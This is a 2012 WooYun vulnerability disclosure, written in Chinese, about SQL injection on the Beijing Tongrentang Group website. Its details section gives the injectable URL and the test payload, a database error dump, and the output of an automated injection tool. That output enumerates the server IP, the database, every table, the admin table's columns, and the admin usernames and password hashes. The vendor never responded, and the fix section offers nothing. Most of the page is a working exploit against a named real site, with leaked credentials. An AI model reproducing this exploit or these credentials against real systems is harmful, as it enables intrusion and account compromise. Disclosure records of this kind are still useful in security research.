当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-05296

漏洞标题:同仁堂(集团)sql注入

相关厂商:中国北京同仁堂(集团)有限责任公司

漏洞作者: zeracker

提交时间:2012-03-16 10:22

修复时间:2012-04-30 10:23

公开时间:2012-04-30 10:23

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-03-16: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-04-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

中国北京同仁堂(集团)官网存在sql注入漏洞。。好歹也市值:191.53亿元。。

详细说明:

http://www.tongrentang.com/trtxsqy/introduce_yc.php?id='%60%228rk1B
Error: exception 'PDOException' with message 'SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'`\"1' at line 1' in /data/web/trt/admin/db.php:36 Stack trace: #0 /data/web/trt/admin/db.php(36): PDO->query('select * from a...') #1 /data/web/trt/trtxsqy/introduce_yc.php(5): db->query('select * from a...') #2 {main}
Analyzing http://www.tongrentang.com/trtxsqy/introduce_yc.php?id='%60%228rk1B
Host IP: 211.99.194.203
Web Server: nginx
Keyword Found: Error:
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 12
Valid String Column is 2
Current DB: trt
Count(table_name) of information_schema.tables where table_schema=0x747274 is 12
Tables found: admin,advt_swf,article,dianmian,dianmian_en,lib,positioninfotable,product,product_en,tag,user,videocategory
Count(table_name) of information_schema.tables where table_schema=0x747274 is 12
Tables found: admin,advt_swf,article,dianmian,dianmian_en,lib,positioninfotable,product,product_en,tag,user,videocategory
Count(table_name) of information_schema.tables where table_schema=0x747274 is 12
Tables found: admin,advt_swf,article,dianmian,dianmian_en,lib,positioninfotable,product,product_en,tag,user,videocategory
Count(column_name) of information_schema.columns where table_schema=0x747274 and table_name=0x61646D696E is 5
Columns found: id,username,password,rights,regtime
Count(*) of trt.admin is 2
Data Found: id=1
Data Found: password=98245d354279aa2faec79779601dd675
Data Found: username=super
Data Found: id=2
Data Found: password=e1f1b43c56ea0e9cd9bcd5b2c2981e1e
Data Found: username=yaodian

漏洞证明:


修复方案:

你们懂的。

版权声明:转载请注明来源 zeracker@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论